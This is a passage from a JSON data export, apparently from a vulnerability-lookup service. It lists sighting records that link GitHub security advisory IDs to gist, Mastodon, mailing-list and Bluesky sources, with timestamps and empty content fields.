"8dde92ee-92bd-4d58-8bfe-70b042546239", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/98076be44b63186a53bdf845de69ea26", "content": "", "creation_timestamp": "2025-07-16T08:12:10.000000Z"}, {"uuid": "9a55caf2-c978-42f5-b25f-271fdf09eee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gp7f-rwcx-9369", "type": "seen", "source": "https://gist.github.com/safer-bot/98076be44b63186a53bdf845de69ea26", "content": "", "creation_timestamp": "2025-07-16T08:12:10.000000Z"}, {"uuid": "46481151-c656-43c5-b33b-ee15edeb9952", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/18f4abbe002522f658a3388a00f97cb0", "content": "", "creation_timestamp": "2025-07-07T04:21:35.000000Z"}, {"uuid": "a35e6e4d-71b1-45f9-a5ce-56d865c05ebb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m44j-cfrm-g8qc", "type": "seen", "source": "https://gist.github.com/safer-bot/18f4abbe002522f658a3388a00f97cb0", "content": "", "creation_timestamp": "2025-07-07T04:21:35.000000Z"}, {"uuid": "8261bd3f-ed8e-4c56-9992-55fa2b9992d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/18f4abbe002522f658a3388a00f97cb0", "content": "", "creation_timestamp": "2025-07-07T04:21:35.000000Z"}, {"uuid": "db061a6b-4010-45b6-864c-860672c6e571", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6r3c-xf4w-jxjm", "type": "seen", "source": "https://gist.github.com/safer-bot/48d1353598fcf59bf977fe29fe9a8e0d", "content": "", "creation_timestamp": "2025-07-16T03:07:48.000000Z"}, {"uuid": "33613e05-ce29-4836-a2ec-2a5c8279ad41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h3gc-qfqq-6h8f", "type": "seen", "source": "https://gist.github.com/safer-bot/48d1353598fcf59bf977fe29fe9a8e0d", "content": "", "creation_timestamp": "2025-07-16T03:07:48.000000Z"}, {"uuid": "e7f69782-fda0-400b-8464-a9c2cbc116bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wc4r-xq3c-5cf3", "type": "seen", "source": "https://gist.github.com/safer-bot/48d1353598fcf59bf977fe29fe9a8e0d", "content": "", "creation_timestamp": "2025-07-16T03:07:48.000000Z"}, {"uuid": "c3750600-e6ad-45b7-821b-6f2fb0d0c2e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/ea116f5a6c0fdd46a9183269ae2c32dc", "content": "", "creation_timestamp": "2025-07-16T08:18:18.000000Z"}, {"uuid": "3463fbc1-4cae-4eb7-ab2f-73c1b55de86e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/ea116f5a6c0fdd46a9183269ae2c32dc", "content": "", "creation_timestamp": "2025-07-16T08:18:18.000000Z"}, {"uuid": "a45ee91c-1f8c-4e56-8fa4-0b6d34c9ec84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/ea116f5a6c0fdd46a9183269ae2c32dc", "content": "", "creation_timestamp": "2025-07-16T08:18:18.000000Z"}, {"uuid": "6a9b8b0d-77cd-4ec0-be92-d158d6a91f26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/5a1a45ea67d04b6f16053f17226d08d4", "content": "", "creation_timestamp": "2025-07-16T12:32:36.000000Z"}, {"uuid": "8cff4806-df3d-4a23-8ab7-e5739ce50556", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/f0ece275d2a5f01cdb6c494e4eda047c", "content": "", "creation_timestamp": "2025-07-16T14:08:37.000000Z"}, {"uuid": "505ddff2-476e-45c1-979d-ec2699fc4594", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "ghsa-g948-229j-48j3", "type": "seen", "source": "https://gist.github.com/brianmcgillion/92b0939bf244e434efeee17184f8307b", "content": "", "creation_timestamp": "2025-06-26T09:04:42.000000Z"}, {"uuid": "40165fd1-f2e3-4f2f-ac93-763c3966025f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rvqx-wpfh-mfx7", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114769000988969113", "content": "", "creation_timestamp": "2025-06-29T22:26:18.405067Z"}, {"uuid": "1b0d141b-348f-43d8-a426-f03e00adef7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/f2a796b1c3ade94b037bb1ddfcabe9b1", "content": "", "creation_timestamp": "2025-07-16T03:14:06.000000Z"}, {"uuid": "ca8ef3f0-2744-476c-8103-5b484e0e7748", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/f2a796b1c3ade94b037bb1ddfcabe9b1", "content": "", "creation_timestamp": "2025-07-16T03:14:06.000000Z"}, {"uuid": "25cb937d-7f32-4857-bafe-86bb05b1052f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wjxj-5m7g-mg7q", "type": "seen", "source": "https://gist.github.com/safer-bot/38b331053a0ecdf4090729e42ca241a8", "content": "", "creation_timestamp": "2025-07-16T08:17:43.000000Z"}, {"uuid": "3dc5784d-4aee-4a97-9c69-308647aa956b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/38b331053a0ecdf4090729e42ca241a8", "content": "", "creation_timestamp": "2025-07-16T08:17:43.000000Z"}, {"uuid": "107693da-c883-48e6-9420-db64ae325339", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/f2a796b1c3ade94b037bb1ddfcabe9b1", "content": "", "creation_timestamp": "2025-07-16T03:14:06.000000Z"}, {"uuid": "dfb59f05-e3b3-47fb-bec7-a4dfda5389ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/f2a796b1c3ade94b037bb1ddfcabe9b1", "content": "", "creation_timestamp": "2025-07-16T03:14:06.000000Z"}, {"uuid": "1a80cc49-af46-49ee-b8d4-a7f2750a7739", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hr8g-6v94-x4m9", "type": "seen", "source": "https://gist.github.com/safer-bot/38b331053a0ecdf4090729e42ca241a8", "content": "", "creation_timestamp": "2025-07-16T08:17:43.000000Z"}, {"uuid": "daa2298a-525b-4f1d-b05d-7802a8fa1e21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7m7h-rgvp-3v4r", "type": "seen", "source": "https://gist.github.com/safer-bot/38b331053a0ecdf4090729e42ca241a8", "content": "", "creation_timestamp": "2025-07-16T08:17:43.000000Z"}, {"uuid": "3e29f2e3-c39b-4af1-a6c3-42802edce131", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/38b331053a0ecdf4090729e42ca241a8", "content": "", "creation_timestamp": "2025-07-16T08:17:43.000000Z"}, {"uuid": "759e6c2b-56d4-432c-a49f-fc6b491c3cda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "f035dd7a-233c-4883-ac47-36b6b8fe4ac3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/f2a796b1c3ade94b037bb1ddfcabe9b1", "content": "", "creation_timestamp": "2025-07-16T03:14:06.000000Z"}, {"uuid": "cdbff11e-0da5-4370-83ad-483591e013be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/f2a796b1c3ade94b037bb1ddfcabe9b1", "content": "", "creation_timestamp": "2025-07-16T03:14:06.000000Z"}, {"uuid": "bfe6399c-ea28-4a4c-8cad-fbe128cde79e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/38b331053a0ecdf4090729e42ca241a8", "content": "", "creation_timestamp": "2025-07-16T08:17:43.000000Z"}, {"uuid": "c58ae762-d853-4590-b41e-90c2007f5868", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/38b331053a0ecdf4090729e42ca241a8", "content": "", "creation_timestamp": "2025-07-16T08:17:43.000000Z"}, {"uuid": "accd5823-fa99-472f-9aab-349e0c41e281", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6xc-xr62-6r2g", "type": "seen", "source": "https://gist.github.com/safer-bot/f321679cb659096c5eb6a7cca02b46cc", "content": "", "creation_timestamp": "2025-07-16T03:17:48.000000Z"}, {"uuid": "454c1301-c7c3-44d1-8ba3-c737a02e9390", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rghw-6px2-fgwc", "type": "seen", "source": "https://gist.github.com/safer-bot/f321679cb659096c5eb6a7cca02b46cc", "content": "", "creation_timestamp": "2025-07-16T03:17:48.000000Z"}, {"uuid": "115394d5-50c4-4923-85ba-62cd22656985", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45hx-wfhj-473x", "type": "seen", "source": "https://gist.github.com/safer-bot/f321679cb659096c5eb6a7cca02b46cc", "content": "", "creation_timestamp": "2025-07-16T03:17:48.000000Z"}, {"uuid": "0505023c-3f6e-4075-9c87-5c5dfb525048", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/f321679cb659096c5eb6a7cca02b46cc", "content": "", "creation_timestamp": "2025-07-16T03:17:48.000000Z"}, {"uuid": "ab2b78eb-f9be-40e7-86b3-20558720b07c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/f321679cb659096c5eb6a7cca02b46cc", "content": "", "creation_timestamp": "2025-07-16T03:17:48.000000Z"}, {"uuid": "b345bcf2-0925-4571-bd10-ade84db3ac7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22wj-vf5f-wrvj", "type": "seen", "source": "https://gist.github.com/safer-bot/f321679cb659096c5eb6a7cca02b46cc", "content": "", "creation_timestamp": "2025-07-16T03:17:48.000000Z"}, {"uuid": "ccfcd326-2f55-4c77-8ce4-4ec488855830", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/f321679cb659096c5eb6a7cca02b46cc", "content": "", "creation_timestamp": "2025-07-16T03:17:48.000000Z"}, {"uuid": "d8d2b431-b614-4cb7-8c9a-031c301ba6b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m5hf-m3r2-xq53", "type": "seen", "source": "https://gist.github.com/safer-bot/38b331053a0ecdf4090729e42ca241a8", "content": "", "creation_timestamp": "2025-07-16T08:17:43.000000Z"}, {"uuid": "3e8ff214-5bc9-49b2-8c46-f459a0e49f6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/90d07149bf456bffe24de786261b869a", "content": "", "creation_timestamp": "2025-07-16T13:32:55.000000Z"}, {"uuid": "a23aa64c-818f-4947-b14a-866448d2d442", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-563g-p98j-mc9q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114427071199222062", "content": "", "creation_timestamp": "2025-04-30T13:09:02.957805Z"}, {"uuid": "56cbc902-2af1-4753-b92e-ae4cf9234b22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvgm-3rw2-7j4r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114427728713256833", "content": "", "creation_timestamp": "2025-04-30T15:56:15.889361Z"}, {"uuid": "b014fc7e-c678-4303-97e0-44525d538df5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jrr2-x33p-6hvc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114427741773438031", "content": "", "creation_timestamp": "2025-04-30T15:59:35.382209Z"}, {"uuid": "1c86b383-0fba-47e1-94aa-943e93f7dbb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x7wv-5qg4-vmr6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114427728713256833", "content": "", "creation_timestamp": "2025-04-30T15:56:16.018482Z"}, {"uuid": "3c40d12d-ce00-45fc-8269-411efe2b90cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xj67-649m-3p8x", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114427734857012817", "content": "", "creation_timestamp": "2025-04-30T15:57:49.656532Z"}, {"uuid": "1dab7765-d270-410c-981a-6c1b4f9894e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5xv6-7jm3-fmg5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114427734857012817", "content": "", "creation_timestamp": "2025-04-30T15:57:49.753941Z"}, {"uuid": "53f45532-b344-4f1b-806e-7514539667e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mqqq-h2x3-46fr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114427772732716398", "content": "", "creation_timestamp": "2025-04-30T16:07:27.754380Z"}, {"uuid": "b257ee61-46d2-4f03-b034-e907b978d7c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8262-pw2q-5qc3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114428551038906711", "content": "", "creation_timestamp": "2025-04-30T19:25:23.647968Z"}, {"uuid": "c0fa2c8d-b4e0-4f00-815d-06768873dca3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8489-44mv-ggj8", "type": "seen", "source": "https://gist.github.com/safer-bot/f321679cb659096c5eb6a7cca02b46cc", "content": "", "creation_timestamp": "2025-07-16T03:17:48.000000Z"}, {"uuid": "9b31c031-00e3-47e7-8b55-93279cc178f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rpj-hg47-cx62", "type": "seen", "source": "https://gist.github.com/safer-bot/f321679cb659096c5eb6a7cca02b46cc", "content": "", "creation_timestamp": "2025-07-16T03:17:48.000000Z"}, {"uuid": "58eab4fc-1ad6-4579-bfb6-af637d1663c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h376-j262-vhq6", "type": "seen", "source": "https://gist.github.com/safer-bot/f321679cb659096c5eb6a7cca02b46cc", "content": "", "creation_timestamp": "2025-07-16T03:17:48.000000Z"}, {"uuid": "7ba8f716-1790-4b3f-9593-7f86854b60b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/38b331053a0ecdf4090729e42ca241a8", "content": "", "creation_timestamp": "2025-07-16T08:17:43.000000Z"}, {"uuid": "1395f422-9e61-4557-9ec7-ac3b26027604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q5r4-cfpx-h6fh", "type": "seen", "source": "https://gist.github.com/safer-bot/64c869407f72779632d4e37261089424", "content": "", "creation_timestamp": "2025-07-16T12:38:05.000000Z"}, {"uuid": "a3bea7ba-844a-470a-a8a7-c270a811714a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r4q3-7g4q-x89m", "type": "seen", "source": "https://gist.github.com/safer-bot/affe11bf7ae62145d9b738badc0cc5b2", "content": "", "creation_timestamp": "2025-07-16T12:40:43.000000Z"}, {"uuid": "a850a7e8-4ff8-4774-9085-881bf9d76d4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/affe11bf7ae62145d9b738badc0cc5b2", "content": "", "creation_timestamp": "2025-07-16T12:40:43.000000Z"}, {"uuid": "e1adbe11-2565-43ba-a789-19bff4a3fede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/ef184347803e15dac9646caefc82d2d0", "content": "", "creation_timestamp": "2025-07-16T13:34:57.000000Z"}, {"uuid": "3b2a6a72-221b-4114-bcf5-d9b12ff77467", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fjpj-2g6w-x25r", "type": "seen", "source": "https://gist.github.com/safer-bot/8f576481ae0b25c2f9292db6db5e2aa7", "content": "", "creation_timestamp": "2025-07-16T03:46:52.000000Z"}, {"uuid": "c5ff1eed-055b-4a5f-b0b7-1d03cc6f307c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/8f576481ae0b25c2f9292db6db5e2aa7", "content": "", "creation_timestamp": "2025-07-16T03:46:52.000000Z"}, {"uuid": "c18bb102-bba5-4626-9836-35e0bddd8d7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-55g7-9cwv-5qfv", "type": "seen", "source": "https://gist.github.com/safer-bot/8f576481ae0b25c2f9292db6db5e2aa7", "content": "", "creation_timestamp": "2025-07-16T03:46:52.000000Z"}, {"uuid": "719cbd23-585b-4e97-b451-571a71424995", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/d34d89e62ed41902a6e632df1c8d020e", "content": "", "creation_timestamp": "2025-07-16T10:32:38.000000Z"}, {"uuid": "e4419a91-537f-46b7-801b-b89996489956", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/d34d89e62ed41902a6e632df1c8d020e", "content": "", "creation_timestamp": "2025-07-16T10:32:38.000000Z"}, {"uuid": "da2a2dff-f3cf-4c9e-a1ed-caae481ebca7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/d34d89e62ed41902a6e632df1c8d020e", "content": "", "creation_timestamp": "2025-07-16T10:32:38.000000Z"}, {"uuid": "4c4fcf1e-8a9d-46fe-8306-27e5739e4757", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/d34d89e62ed41902a6e632df1c8d020e", "content": "", "creation_timestamp": "2025-07-16T10:32:38.000000Z"}, {"uuid": "522c5274-2f70-47f2-a862-e35a7a7432b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-356w-63v5-8wf4", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114655027697783093", "content": "", "creation_timestamp": "2025-06-09T19:21:23.799632Z"}, {"uuid": "e637e18e-03ec-4172-ae01-71a98983df03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xp8-gmmj-xc8w", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/95", "content": "", "creation_timestamp": "2025-04-25T13:55:31.000000Z"}, {"uuid": "4e9c145e-cad0-485d-99ae-5ad8b31e9d1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-019", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3logifdas742t", "content": "", "creation_timestamp": "2025-05-05T13:36:33.863441Z"}, {"uuid": "8012d8e5-82ad-4a27-8c6b-153d244a6edb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mf88-g2wq-p7qm", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114456436384488510", "content": "", "creation_timestamp": "2025-05-05T17:37:00.149080Z"}, {"uuid": "95ff128c-a9f8-4f08-af6c-f321b1962325", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/8f576481ae0b25c2f9292db6db5e2aa7", "content": "", "creation_timestamp": "2025-07-16T03:46:52.000000Z"}, {"uuid": "945e5b2b-8a90-464c-8d31-fd982f146f44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pqr6-cmr2-h8hf", "type": "seen", "source": "https://gist.github.com/safer-bot/8f576481ae0b25c2f9292db6db5e2aa7", "content": "", "creation_timestamp": "2025-07-16T03:46:52.000000Z"}, {"uuid": "c44836be-80c9-4e56-9b60-766fc19f4e3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/8f576481ae0b25c2f9292db6db5e2aa7", "content": "", "creation_timestamp": "2025-07-16T03:46:52.000000Z"}, {"uuid": "a7312d5b-1a5c-459d-9d4a-6ecdd1396a8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/e39dcfe3eb5f5feb41d1528795aab73a", "content": "", "creation_timestamp": "2025-07-16T08:34:49.000000Z"}, {"uuid": "fe2ef01c-a7ff-4138-9e57-2226d79d866e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-88cv-mj24-8w3q", "type": "confirmed", "source": "https://gist.github.com/FrancoisCapon/a196def512f709769d99d9fba9f55cfc", "content": "", "creation_timestamp": "2025-06-24T11:11:05.000000Z"}, {"uuid": "9e71a70f-0a2b-4d11-9c97-a5a57481213e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557j-xg8c-q2mm", "type": "seen", "source": 